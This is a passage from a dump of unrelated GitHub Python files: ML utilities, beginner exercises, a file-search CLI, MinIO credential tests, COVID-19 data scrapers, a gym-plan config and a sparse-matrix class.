A.clone() \n    Xrot, Yrot = X, Y\n    for _ in range(num):\n        Xrot, Yrot = (Xrot - Yrot + center[0])%L, Xrot\n        B[:, Xrot, Yrot] = A[:, X, Y]\n    return B.reshape(input_shape)\n\ndef decimalToAny(n,x):\n    # a=[0,1,2,3,4,5,6,7,8,9,'A','b','C','D','E','F']\n    b=[]\n    while True:\n        s=n//x \n        y=n%x \n        b=b+[y]\n        if s==0:\n            break\n        n=s\n    b.reverse()\n\n    return b\n\ndef _del_nested_attr(obj: nn.Module, names: List[str]) -> None:\n    \"\"\"\n    Deletes the attribute specified by the given list of names.\n    For example, to delete the attribute obj.conv.weight,\n    use _del_nested_attr(obj, ['conv', 'weight'])\n    \"\"\"\n    if len(names) == 1:\n        delattr(obj, names[0])\n    else:\n        _del_nested_attr(getattr(obj, names[0]), names[1:])\n\ndef _set_nested_attr(obj: nn.Module, names: List[str], value: Tensor) -> None:\n    \"\"\"\n    Set the attribute specified by the given list of names to value.\n    For example, to set the attribute obj.conv.weight,\n    use _set_nested_attr(obj, ['conv', 'weight'], value)\n    \"\"\"\n    if len(names) == 1:\n        setattr(obj, names[0], value)\n    else:\n        _set_nested_attr(getattr(obj, names[0]), names[1:], value)\n\ndef extract_weights(mod: nn.Module) -> Tuple[Tuple[Tensor, ...], List[str]]:\n    \"\"\"\n    This function removes all the Parameters from the model and\n    return them as a tuple as well as their original attribute names.\n    The weights must be re-loaded with `load_weights` before the model\n    can be used again.\n    Note that this function modifies the model in place and after this\n    call, mod.parameters() will be empty.\n    \"\"\"\n    orig_params = tuple(mod.parameters())\n    # Remove all the parameters in the model\n    names = []\n    for name, p in list(mod.named_parameters()):\n        
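# added note: deleting each nested attribute detaches the Parameter from the module;\n        # load_weights later re-attaches plain tensors under the same dotted names.\n        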
_del_nested_attr(mod, name.split(\".\"))\n        names.append(name)\n\n    # Make params regular Tensors instead of nn.Parameter\n    params = tuple(p.detach().requires_grad_() for p in orig_params)\n    return params, names\n\ndef load_weights(mod: nn.Module, names: List[str], params: Tuple[Tensor, ...]) -> None:\n    \"\"\"\n    Reload a set of weights so that `mod` can be used again to perform a forward pass.\n    Note that the `params` are regular Tensors (that can have history) and so are left\n    as Tensors. This means that mod.parameters() will still be empty after this call.\n    \"\"\"\n    for name, p in zip(names, params):\n        _set_nested_attr(mod, name.split(\".\"), p)\n    \n    \ndef np_rot60(A, num=1, axes=[0,1],center=[0]):\n    input_shape = A.shape\n    L = A.shape[axes[0]]\n    W = A.shape[axes[1]]\n    A = A.reshape(-1,L,W)\n    \n    X, Y = np.meshgrid(np.arange(W), np.arange(L))\n    B = A.copy() \n    Xrot, Yrot = X, Y\n    for _ in range(num):\n        Xrot, Yrot = (Xrot - Yrot + center[0])%L, Xrot\n        B[:, Xrot, Yrot] = A[:, X, Y]\n    return B.reshape(input_shape)\n\n\n","repo_name":"chenfeng2013301020145/VMC-PPO","sub_path":"utils_ppo.py","file_name":"utils_ppo.py","file_ext":"py","file_size_in_byte":15981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24850998298","text":"'''\n9-14: Lottery: Make a list or tuple containing a series of 10 numbers and 5 letters. Randomly select\nfour numbers or letters from the list and print a message saying that any ticket matching these four numbers\nor letters wins a prize\n'''\nfrom random import randint\n\nlottery_choices = ['A', 'B', 'C', 'D', 'E', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']\nwinning_ticket = 'C2A9'\n\nbought_ticket = []\n\ncounter = 0\n\ndef generate_ticket():\n    for i in range(0, 4):\n        bought_ticket.append(lottery_choices[randint(0, len(lottery_choices) - 1)])\n    print(''.join(bought_ticket))\n\n\nwhile True:\n    generate_ticket()\n\n    if ''.join(bought_ticket) != winning_ticket:\n        print(\"Not a winning ticket!\")\n        counter += 1\n        bought_ticket.clear()\n    else:\n        break\n\nprint('Winning Ticket: ', ''.join(bought_ticket))\nprint(f'It only took {counter} times')\n\n'''\nSTYLING CLASSES\n--------------\nClass names should be written in CamelCase. Instance and module names should be written in lowercase\nw/ underscores between words. \nEvery class should have a docstring immediately following the class definition. The docstring description\nshould be about what the class does, and you should follow the same formatting conventions you used for writing docstrings\nin functions. Each module should also have a docstring describing what the classes in a module can be used for. 
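\n\nFor example (an illustrative sketch added for this note, not part of the lottery program above):\n\nclass LotteryDrawing:\n    \"\"\"Represent one drawing of four winning symbols.\"\"\"\n\n    def __init__(self, winning_symbols):\n        \"\"\"Store the symbols that make up the winning ticket.\"\"\"\n        self.winning_symbols = winning_symbols\n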
\n'''","repo_name":"CodeSoju/PythonCrashCourse","sub_path":"Chapter9/lottery.py","file_name":"lottery.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30133623080","text":"#!/usr/bin/env python\nfrom os import path\nimport argparse\nfrom src.libs.file_search_util import search_file\nfrom src.libs.os_util import get_visible_files_from_dir, get_recursive_files_from_dir\nfrom src.libs.color_util import ERROR_COLOR, RESET_COLOR\nimport sys\nimport colorama\n\"\"\"Advanced file search program\"\"\"\n'''Options -r recursive'''\n\n\nCURRENT_DIR = path.abspath(path.join(path.dirname(__file__)))\n\n\ndef format_error_string(phrase, file, error) -> str:\n formatted_string = ERROR_COLOR + \"{0}, {1}\".format(phrase, file) + \"\\n\" + str(error) + RESET_COLOR\n return formatted_string\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Searches for files in directory for a word or phrase\")\n parser.add_argument(\"phrase\", metavar=\"P\", type=str, help=\"Phrase for searching\")\n parser.add_argument(\"-d\", \"--directory\", metavar=\"D\", type=str, help=\"Directory for the search\", default=\".\")\n parser.add_argument(\"-r\", \"--recursive\", action=\"store_true\", help=\"Declares whether the folders within \"\n \"folders are searched\"\n )\n\n args = parser.parse_args()\n\n colorama.init()\n print(\"Searching with CCSearch.\\n\")\n if args.phrase is not None:\n if args.directory:\n selected_dir = args.directory\n else:\n selected_dir = CURRENT_DIR\n\n if args.recursive:\n file_list = get_recursive_files_from_dir(selected_dir)\n else:\n file_list = get_visible_files_from_dir(CURRENT_DIR)\n\n for file in file_list:\n try:\n sys_out = search_file(file, args.phrase)\n sys.stdout.write(sys_out)\n except UnicodeDecodeError as error:\n print(format_error_string(\"This file is not detectable as a readable file\", file, error))\n except PermissionError as error:\n print(format_error_string(\"This file does not have valid permissions\", file, error))\n\n else:\n print(\"Error, a phrase is required\")\n\n\nmain()\n","repo_name":"ChristopherCampos/ccsearch","sub_path":"src/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2265249887","text":"# -*- coding: utf-8 -*-\n# MinIO Python Library for Amazon S3 Compatible Cloud Storage, (C)\n# 2020 MinIO, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nfrom unittest import TestCase\n\nfrom minio.credentials.env_aws import EnvAWS\nfrom minio.credentials.credentials import Value\nfrom nose.tools import eq_\n\nclass EnvAWSTest(TestCase):\n\n def test_env_aws_retrieve(self):\n # clear environement\n os.environ.clear()\n # set environment variables\n os.environ[\"AWS_ACCESS_KEY_ID\"] = \"access\"\n os.environ[\"AWS_SECRET_ACCESS_KEY\"] = \"secret\"\n os.environ[\"AWS_SESSION_TOKEN\"] = \"token\"\n # init new 
env_aws provider\n        provider = EnvAWS()\n        # assert expired true for newly created provider\n        eq_(provider.is_expired(), True)\n        # retrieve provider credentials\n        creds = provider.retrieve()\n        # assert expected data\n        expected_creds = Value(\n            access_key=\"access\",\n            secret_key=\"secret\",\n            session_token=\"token\"\n        )\n        eq_(creds.access_key, expected_creds.access_key)\n        eq_(creds.secret_key, expected_creds.secret_key)\n        eq_(creds.session_token, expected_creds.session_token)\n        # assert expired false for retrieved credentials\n        eq_(provider.is_expired(), False)\n\n    def test_env_aws_retrieve_no_token(self):\n        # clear environment\n        os.environ.clear()\n        # set environment variables\n        os.environ[\"AWS_ACCESS_KEY_ID\"] = \"access\"\n        os.environ[\"AWS_SECRET_ACCESS_KEY\"] = \"secret\"\n        # Init new env_aws provider\n        provider = EnvAWS()\n        # assert expired true for newly created provider\n        eq_(provider.is_expired(), True)\n        # retrieve provider credentials\n        creds = provider.retrieve()\n        # assert expected data\n        expected_creds = Value(\n            access_key=\"access\",\n            secret_key=\"secret\",\n            session_token=None\n        )\n        eq_(creds.access_key, expected_creds.access_key)\n        eq_(creds.secret_key, expected_creds.secret_key)\n        eq_(creds.session_token, expected_creds.session_token)\n        # assert expired false for retrieved credentials\n        eq_(provider.is_expired(), False)\n","repo_name":"VariousForks/minio-py","sub_path":"tests/unit/env_aws_provider_test.py","file_name":"env_aws_provider_test.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"1715384293","text":"# dependencies \n# This Python file uses the following encoding: utf-8\nimport numpy as np\nfrom numpy import NaN\nimport pandas as pd\nimport requests\nimport io\nimport json\nfrom bs4 import BeautifulSoup # needed by get_hanoi_covid_data below\n\ndef map_world_data():\n    \"\"\"\n    Get World data\n    @Parameter: none\n    @return: dff, cases, deaths (dataframe type)\n    \"\"\"\n    url=\"https://services1.arcgis.com/0MSEUqKaxRlEPj5g/arcgis/rest/services/ncov_cases2_v1/FeatureServer/2/query?where=1%3D1&outFields=Country_Region,Confirmed,Deaths,Mortality_Rate,ISO3&returnGeometry=false&outSR=4326&f=json\"\n    rq=requests.get(url).text\n    data=json.loads(rq)\n    df=pd.json_normalize(data[\"features\"])\n    df.rename(columns={'attributes.Country_Region': 'Quốc gia', 'attributes.Confirmed': 'Số ca','attributes.Deaths':'Tử vong','attributes.Mortality_Rate':'Tỉ lệ tử vong','attributes.ISO3':'id'}, inplace=True)\n    df.set_index('id', inplace=True, drop=False)\n    dff=df.sort_values(by=['Số ca'],ascending=False)\n    cases=dff['Số ca'].sum()\n    deaths=dff['Tử vong'].sum() \n    return dff,cases,deaths\n\ndef map_vn_data():\n    \"\"\"\n    Get VIETNAM COVID data\n    @parameter: none\n    @return: dff, nocases, cases, deaths, today, casesToday (dataframe type)\n    \"\"\"\n    today, total_data_df, today_data_df, overview_7days_df, city_data_df=get_vietnam_covid_data()\n    url=\"https://raw.githubusercontent.com/namnguyen215/dataset/main/vn_location.json\"\n    rq=requests.get(url).text\n    data=json.loads(rq)\n    vn_location=pd.json_normalize(data)\n    df=city_data_df\n    df.loc[df['name']==\"Bà Rịa – Vũng Tàu\",\"name\"]=\"Bà Rịa - Vũng Tàu\"\n    dff=pd.merge(df,vn_location)\n    nocases=[]\n    for x in dff['cases']:\n        if(x == 0):\n            nocases.append(0)\n        else:\n            nocases.append(np.log2(x))\n    cases=total_data_df.internal['cases']\n    deaths=total_data_df.internal['death'] \n    casesToday=today_data_df.internal['cases']\n    dff.rename(columns={\"name\":\"Tỉnh thành\",\"cases\":\"Số ca\",\"death\":\"Tử 
vong\",\"casesToday\":\"Số ca hôm nay\"}, inplace=True)\n return dff,nocases,cases,deaths,today,casesToday\n \ndef get_world_covid_data():\n \"\"\"\n Return a dataframe of COVID data of 215 countries\n \"\"\"\n # Source: Our World In Data: \"https://github.com/owid/covid-19-data\"\n data_requests = requests.get(\n 'https://raw.githubusercontent.com/owid/covid-19-data/master/public/data/latest/owid-covid-latest.json')\n\n world_data = dict(data_requests.json())\n df = pd.DataFrame(world_data).T\n df = df[['location', 'continent', 'total_cases', 'total_deaths',\n 'last_updated_date', 'people_vaccinated', 'total_cases_per_million', 'total_deaths_per_million', 'people_vaccinated_per_hundred', 'population', 'people_fully_vaccinated']]\n df.dropna(axis=0, thresh=6, inplace=True)\n return df\n\n\ndef get_vietnam_covid_data():\n \"\"\"\n Return COVID data of VietNam, world:\n (str)today = today's date\\n\n (df)total_data_df: 'death', 'treating', 'cases', 'recovered' (today_data_df.internal['death'])\\n\n (df)today_data_df: 'death', 'treating', 'cases', 'recovered'\\n\n (df)overview_7days_df: 'date', 'death', 'treating', 'cases', 'recovered', 'avgCases7day', 'avgRecovered7day', 'avgDeath7day'\\n\n (df)city_data_df: 'name','death', 'treating', 'cases', 'recovered', 'casesToday'\n \"\"\"\n\n #Source: \"https://covid19.gov.vn/\"\n response = requests.get(\"https://static.pipezero.com/covid/data.json\")\n vietnam_covid_data_dict = response.json()\n\n total_data_df = pd.DataFrame(vietnam_covid_data_dict['total'])\n today_data_df = pd.DataFrame(vietnam_covid_data_dict['today'])\n overview_7days_df = pd.DataFrame(vietnam_covid_data_dict['overview'])\n today = overview_7days_df.iloc[-1]['date']\n city_data_df = pd.DataFrame(vietnam_covid_data_dict['locations'])\n city_data_df = city_data_df[['name', 'cases', 'death', 'casesToday']]\n\n return today, total_data_df, today_data_df, overview_7days_df, city_data_df\n\n\ndef get_hanoi_covid_data():\n \"\"\"\n Return a dataframe COVID data of Hanoi ('locations' - 'positive cases')\n \"\"\"\n lst = []\n page = requests.get(\"https://covidmaps.hanoi.gov.vn/\")\n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(id=\"list-statistic2\")\n elements = results.find_all(\"div\", class_=\"item-box\")\n for element in elements:\n tmp = {}\n location = element.find(\"div\", class_=\"title-region\")\n numbers = element.find(\"div\", class_=\"val-region\")\n tmp[\"location\"] = location.text.strip()\n tmp[\"positive\"] = int(numbers.text.strip())\n lst.append(tmp)\n df = pd.DataFrame.from_records(lst)\n\n return df\n\n\ndef get_vaccine_data_vietnam_city():\n \"\"\"\n Return a dataframe Vaccine data Vietnam city\n Source: \"https://vnexpress.net/covid-19/vaccine\"\n \"\"\"\n response = requests.get(\n \"https://vnexpress.net/microservice/sheet/type/vaccine_data_vietnam_city\")\n data_text = response.text\n buf = io.StringIO(data_text)\n df = pd.read_csv(buf, delimiter=\",\")\n vietnam_vaccine_city = df[['fK', 'Tổng số dân trên 18 tuổi', 'Số người tiêm liều 1', 'Số người tiêm liều 2 ', 'Tỷ lệ tiêm', 'Tỷ lệ tiêm đủ liều']]\n\n vietnam_vaccine_city['Tỷ lệ tiêm'].replace(\",\", \".\", inplace = True, regex = True)\n vietnam_vaccine_city['Tỷ lệ tiêm'] = pd.to_numeric(vietnam_vaccine_city['Tỷ lệ tiêm'])\n vietnam_vaccine_city['Tỷ lệ tiêm đủ liều'].replace(\",\", \".\", inplace = True, regex = True)\n vietnam_vaccine_city['Tỷ lệ tiêm đủ liều'] = pd.to_numeric(vietnam_vaccine_city['Tỷ lệ tiêm đủ liều'])\n\n vietnam_vaccine_city['Tỷ lệ tiêm 1 mũi'] = 
vietnam_vaccine_city['Tỷ lệ tiêm'] - vietnam_vaccine_city['Tỷ lệ tiêm đủ liều']\n vietnam_vaccine_city['Tỷ lệ chưa tiêm'] = 100.0 - vietnam_vaccine_city['Tỷ lệ tiêm']\n return vietnam_vaccine_city\n\n\n\n\ndef get_vaccine_data_vietnam():\n \"\"\"\n Return a dataframe Vaccine to Vietnam\n df.loc[df[\"Ngày\"][:] == \"9/10\"]\n \"\"\"\n response = requests.get(\n \"https://vnexpress.net/microservice/sheet/type/vaccine_data_vietnam\")\n data_text = response.text\n buf = io.StringIO(data_text)\n df = pd.read_csv(buf, delimiter=\",\")\n vaccine_data_vietnam = df[['Ngày', 'Tổng số người đã tiêm']]\n vaccine_data_vietnam.dropna(axis=0, thresh=2, inplace=True)\n date = pd.date_range(\"2021-03-07\", periods=len(vaccine_data_vietnam), freq=\"D\")\n vaccine_data_vietnam['Thời gian'] = date\n return vaccine_data_vietnam\n\ndef get_vietnam_covid_19_time_series():\n '''\n Return a dataframe. Confirmed and Deaths of Vietnam from 22/1/2020\n Source: \"https://github.com/CSSEGISandData/COVID-19\"\n '''\n today, total_data_df, today_data_df, overview_7days_df, city_data_df = get_vietnam_covid_data()\n # confirmed \n response = requests.get(\n \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv\")\n data_text = response.text\n buf = io.StringIO(data_text)\n df = pd.read_csv(buf, delimiter=\",\")\n time_series_confirmed_vn = df.iloc[275][4:]\n #deaths\n response = requests.get(\n \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\")\n data_text = response.text\n buf = io.StringIO(data_text)\n df = pd.read_csv(buf, delimiter=\",\")\n time_series_deaths_vn = df.iloc[275][4:]\n #merge two series\n\n time_series_vn = pd.DataFrame(data=[], index=[])\n date = pd.Series(time_series_confirmed_vn.index, name='Ngày')\n date = pd.to_datetime(date)\n time_series_vn['Ngày'] = date.array\n time_series_vn['Số ca nhiễm'] = time_series_confirmed_vn.array\n time_series_vn['Tử vong'] = time_series_deaths_vn.array\n\n return time_series_vn\n\n","repo_name":"nukima/covid19-dashboard","sub_path":"get_covid_data.py","file_name":"get_covid_data.py","file_ext":"py","file_size_in_byte":8022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32774568078","text":"\"\"\"\n\n\"\"\"\nfrom kiteconnect import KiteConnect\nimport pandas as pd\nimport datetime\n\nfrom credentials.kite import access_token, api_key\n\nclass stock:\n def __init__(self, underlying):\n self.underlying = underlying\n self.underlying_ticker = underlying.underlying_ticker\n underlying.stock = self\n\n def get_data(self, start_date, end_date, interval):\n kite = KiteConnect(api_key=api_key)\n kite.set_access_token(access_token)\n\n ticker_name = self.underlying_ticker\n nse_data = pd.DataFrame(kite.instruments('NSE'))\n\n token = nse_data[nse_data.tradingsymbol == ticker_name].instrument_token.values[0]\n kite_data_historical = kite.historical_data(token, start_date,\n end_date,\n interval, continuous=False, oi=False)\n self.data = pd.DataFrame(kite_data_historical)\n","repo_name":"Suprabhash/MultiAssetClassTrading","sub_path":"Base/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19309722126","text":"import modulo\nimport random\n\ndef menu():\n print('')\n print('1. 
Carga automatica de alumnos')\n    print('2. Mostrar alumnos ordenados por apellido de menor a mayor')\n    print('3. Cantidad de alumnos por nivel')\n    print('4. Monto total a abonar a un tutor mediante dni')\n    print('5. Descuento a alumno de 10% mediante apellido')\n    print('0. Salir')\n    print('')\n    return input('Ingrese una opcion: ')\n\ndef cargar_n():\n    while True:\n        n = int(input('Ingrese la cantidad de alumnos a cargar: '))\n        if n > 0:\n            return n\n        else:\n            print('Ingrese un valor positivo')\n\n\ndef cargar_registro_alumnos(n,vec):\n    nombres = 'Francisco', 'Martina', 'Ariana'\n    apellidos = 'Andrade', 'Espinoza', 'Villalba'\n    \n    for i in range(n):\n        dni = random.randint(10000000, 60000000)\n        nombre = random.choice(nombres)\n        apellido = random.choice(apellidos)\n        dni_tutor = random.randint(10000000, 60000000)\n        importe = round(random.uniform(1000, 8000),2)\n        nivel_cursado = random.randint(0, 12)\n        vec.append(modulo.Alumno(dni, nombre, apellido, dni_tutor, importe, nivel_cursado))\n\ndef ordenar_vector(vec):\n    for i in range(len(vec)-1):\n        for j in range(i+1, len(vec)):\n            if vec[i].apellido > vec[j].apellido:\n                vec[i],vec[j] = vec[j], vec[i]\n\ndef mostrar_vector(vec):\n    for alumno in vec:\n        print(alumno)\n\ndef contar_alumnos_por_nivel(vec):\n    vec_cont = 13 * [0]\n    for alumno in vec:\n        vec_cont[alumno.nivel_cursado] += 1\n    return vec_cont\n\ndef mostrar_contador(vec_cont):\n    for i in range(len(vec_cont)):\n        if vec_cont[i] > 0:\n            print('La cantidad de alumnos del nivel', i, 'es', vec_cont[i])\n\ndef importe_acumulado_tutor(dni_tutor, vec):\n    importe = 0\n    for alumno in vec:\n        if alumno.dni_tutor == dni_tutor:\n            importe += alumno.importe\n    return importe\n\ndef buscar(apellido,vec):\n    for alumno in vec:\n        if alumno.apellido == apellido:\n            # aplica el descuento del 10% sobre el importe\n            alumno.importe = alumno.importe - (alumno.importe * 10) / 100\n            return alumno\n    return 'No existe un alumno con ese apellido!'\n\ndef principal():\n    \n    vec_alumnos = []\n\n    while True:\n        op = menu()\n\n        if op == '0':\n            break\n        elif op == '1':\n            n = cargar_n()\n            print(n)\n            cargar_registro_alumnos(n,vec_alumnos)\n            print('Alumnos cargados!')\n        elif op == '2':\n            ordenar_vector(vec_alumnos)\n            mostrar_vector(vec_alumnos)\n        elif op == '3':\n            vec_cont = contar_alumnos_por_nivel(vec_alumnos)\n            mostrar_contador(vec_cont)\n        elif op == '4':\n            dni_tutor = int(input('Ingrese el dni del tutor: '))\n            total = importe_acumulado_tutor(dni_tutor,vec_alumnos)\n            print('El importe acumulado para el tutor con dni', dni_tutor, 'es', total)\n        elif op == '5':\n            apellido = input('Ingrese el apellido del alumno: ')\n            encontrado = buscar(apellido,vec_alumnos)\n            print(encontrado)\n        else:\n            print('Ingrese una opcion valida')\n    \n\nif __name__ == '__main__':\n    principal()\n","repo_name":"franAndrad/python-src","sub_path":"clases/f21_repasoparcial5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13533194453","text":"from pathlib import Path\n\nimport json\n\nfrom .session_type import SessionType\nfrom .muscle_group import MuscleGroup\n\n\"\"\"This config allows defining the number of exercises of a specific muscle group to be associated with specific gym days\"\"\"\n\n#TODO Create class for config alteration:\n# -Init base config\n# -Change config\n# -Switch between 3 preset configs?\n# - DB config integration?\n\n\n# ---- Choosable GYM days ----\n# - Allow the user to choose their gym days prior to generation (check box)\n# - From the checked answers we can remove indexes from the 
possible indexes, or even create new ones?\n\n\"\"\"Below assigns whether the plan will generate a 3 or a 4 day week for gym workouts\"\"\"\nCURRENT_PLAN = 3\n\n\n\"\"\" 3 gym 3 cardio plan \"\"\"\ndef get_gym_config():#3): #type: ignore\n \"\"\"\n Function to return the gym config based on current selection.\n Returns a tuple of (GYM_INDEXES, WEEK_ALLOWANCE, GYM_DAY_CONFIG):\n GYM_INDEXES: a list of weekday index possibilites for the gym days\n WEEK_ALLOWANCE: a dict of SessionTypes: int of days that each session occurs\n GYM_DAY_CONFIG: a dict of the gym SessionTypes and the number of exercises per MuscleGroup\n \"\"\"\n \n # if days:\n # CURRENT_PLAN = days\n\n if CURRENT_PLAN == 3: #type: ignore\n\n # To allow for a day gap between each gym session, below are all possible configurations indexes of the week.\n GYM_INDEXES = [\n [0,2,4],\n [0,2,5],\n [0,2,6],\n [0,3,5],\n [0,3,6],\n [0,4,6],\n [1,3,5],\n [1,3,6],\n [1,4,6],\n [2,4,6]\n ]\n\n # Week consists of: {Type of workout session: number of weekdays}\n WEEK_ALLOWANCES = {\n SessionType.BACK_CORE_ARMS: 1,\n SessionType.CHEST_SHOULDERS: 1,\n SessionType.LEGS: 1,\n SessionType.CARDIO: 3,\n SessionType.REST: 2\n }\n\n GYM_DAY_CONFIG = {\n\n SessionType.BACK_CORE_ARMS: (\n (MuscleGroup.UPPER_BACK, 2),\n (MuscleGroup.LOWER_BACK, 1),\n (MuscleGroup.CORE, 1),\n (MuscleGroup.BICEP, 2),\n (MuscleGroup.TRICEP, 2)\n ),\n\n SessionType.CHEST_SHOULDERS: (\n (MuscleGroup.CHEST_PRESS, 3),\n (MuscleGroup.CHEST_FLY, 2),\n (MuscleGroup.SHOULDER_PRESS, 2),\n (MuscleGroup.SHOULDER_SIDE, 2)\n ),\n \n SessionType.LEGS: (\n (MuscleGroup.WHOLE_LEG, 3),\n (MuscleGroup.QUADS, 1),\n (MuscleGroup.HAMSTRINGS, 1),\n (MuscleGroup.GLUTES, 1)\n ),\n }\n\n PLAN_CONFIG = (GYM_INDEXES, WEEK_ALLOWANCES, GYM_DAY_CONFIG) \n return PLAN_CONFIG\n\n\n \"\"\"4 day gym phase 1\"\"\"\n\n if CURRENT_PLAN == 4: #type: ignore\n\n #4 day indexes: includes one back to back day\n GYM_INDEXES = [\n [0,1,3,5],\n [0,1,3,6],\n [0,1,4,6],\n [0,2,3,5],\n [0,2,3,6],\n [0,2,4,5],\n [0,2,4,6],\n [0,2,5,6],\n [0,3,4,6],\n [0,3,5,6],\n [1,2,4,6],\n [1,3,4,6],\n [1,3,5,6]\n ]\n\n WEEK_ALLOWANCES = {\n SessionType.UPPER: 2,\n SessionType.LOWER: 2,\n SessionType.CARDIO: 1,\n SessionType.REST: 2\n }\n\n GYM_DAY_CONFIG = {\n\n SessionType.UPPER: (\n (MuscleGroup.CHEST_PRESS, 2),\n (MuscleGroup.UPPER_BACK, 1),\n (MuscleGroup.CHEST_FLY, 1),\n (MuscleGroup.CORE, 1),\n (MuscleGroup.BICEP, 2),\n (MuscleGroup.TRICEP, 2)\n ),\n\n SessionType.LOWER: (\n (MuscleGroup.LOWER_BACK, 1),\n (MuscleGroup.WHOLE_LEG, 3),\n (MuscleGroup.SHOULDER_PRESS, 1),\n (MuscleGroup.SHOULDER_SIDE, 1),\n (MuscleGroup.QUADS, 1),\n (MuscleGroup.HAMSTRINGS, 1),\n (MuscleGroup.GLUTES, 1)\n )\n\n }\n\n\n PLAN_CONFIG = (GYM_INDEXES, WEEK_ALLOWANCES, GYM_DAY_CONFIG) \n return PLAN_CONFIG\n\n\n\n\n\n\n\n# CURRENT_CONFIG_FILE = Path(r\"gym_config.json\")\n\n# def config_to_json(config_file):\n\n# with open(CURRENT_CONFIG_FILE, 'w') as f:\n# json.dumps(GYM_DAY_CONFIG)\n\n\n","repo_name":"TWGurnee/HomeAutomation","sub_path":"src/Data/Exercise/gym_day_allowances.py","file_name":"gym_day_allowances.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9705152293","text":"class SparseMatrix:\n def __init__(self, numRows, numCols):\n assert numRows > 0 and numCols > 0, \\\n \"Each dimension of Sparse Matrix must be > 0.\"\n self._numRows = numRows\n self._numCols = numCols\n self._elemList = list()\n\n def numRows(self):\n return 
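The two CURRENT_PLAN branches in get_gym_config above duplicate the tuple-assembly boilerplate; a dictionary keyed by the number of gym days keeps the presets declarative and makes adding a third plan a one-entry change. In this sketch the *_3_DAY / *_4_DAY names are hypothetical stand-ins for the literals defined inside the branches above:

PLAN_CONFIGS = {
    3: (GYM_INDEXES_3_DAY, WEEK_ALLOWANCES_3_DAY, GYM_DAY_CONFIG_3_DAY),
    4: (GYM_INDEXES_4_DAY, WEEK_ALLOWANCES_4_DAY, GYM_DAY_CONFIG_4_DAY),
}

def get_gym_config(days: int = CURRENT_PLAN):
    # Look the preset up instead of walking if-branches; unknown day counts fail loudly.
    try:
        return PLAN_CONFIGS[days]
    except KeyError:
        raise ValueError(f"No preset plan for {days} gym days") from None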
self._numRows\n\n def numCols(self):\n return self._numCols\n\n def __getitem__(self, ndxTuple):\n assert len(ndxTuple) == 2, \"Invalid number of matrix subscripts\"\n row = ndxTuple[0]\n col = ndxTuple[1]\n assert row >= 0 and row < self.numRows() and \\\n col >= 0 and col < self.numCols(), \\\n \"Matrix subscript out of range.\"\n ndx = self._findPosition(row, col)\n if ndx is not None:\n return self._elemList[ndx].value\n else:\n return 0.0\n def __setitem__(self, ndxTuple, scalar):\n assert len(ndxTuple) == 2, \"Invalid number of matrix subscripts\"\n row = ndxTuple[0]\n col = ndxTuple[1]\n assert row >= 0 and row < self.numRows() and \\\n col >= 0 and col < self.numCols(), \\\n \"Matrix subscript out of range.\"\n ndx = self._findPosition(row, col)\n if ndx is not None:\n if scalar != 0.0:\n self._elemList[ndx].value = scalar\n else:\n self._elemList.pop(ndx)\n else:\n if scalar != 0.0:\n element = _MatrixElement(row, col, scalar)\n self._elemList.append(element)\n\n def scaleBy(self, scalar):\n for element in self._elemList:\n element.value *= scalar\n\n def __add__(self, rhsMatrix):\n assert rhsMatrix.numRows() == self.numRows() and \\\n rhsMatrix.numCols() == self.numCols(), \\\n \"Matrix sizes not compatible for the add operation.\"\n newMatrix = SparseMatrix( self.numRows(), self.numCols() )\n for element in self._elemList :\n dupElement = _MatrixElement(element.row, element.col, element.value)\n newMatrix._elemList.append( dupElement )\n for element in rhsMatrix._elemList :\n newMatrix[ element.row, element.col ] += element.value\n return newMatrix\n\n def __sub__(self, rhsMatrix):\n assert rhsMatrix.numRows() == self.numRows() and \\\n rhsMatrix.numCols() == self.numCols(), \\\n \"Matrix sizes not compatible for the add operation.\"\n newMatrix = SparseMatrix( self.numRows(), self.numCols() )\n for element in self._elemList :\n dupElement = _MatrixElement(element.row, element.col, element.value)\n newMatrix._elemList.append( dupElement )\n for element in rhsMatrix._elemList :\n newMatrix[ element.row, element.col ] -= element.value\n return newMatrix\n\n def __mul__(self, rhsMatrix):\n assert rhsMatrix.numRows() == self.numCols(), \\\n \"Matrix sizes not compatible for the multiply operation!\"\n numRows = self.numRows()\n numCols = self.numCols()\n newMatrix = SparseMatrix(numRows, numCols)\n for elem in self._elemList:\n for relem in rhsMatrix._elemList:\n if elem.col == relem.row:\n product = elem.value * relem.value\n newMatrix[elem.row, relem.col] += product\n return newMatrix\n\n def _findPosition(self, row, col):\n n = len(self._elemList)\n for i in range(n):\n if row == self._elemList[i].row and \\\n col == self._elemList[i].col:\n return i\n return None\n\n\nclass 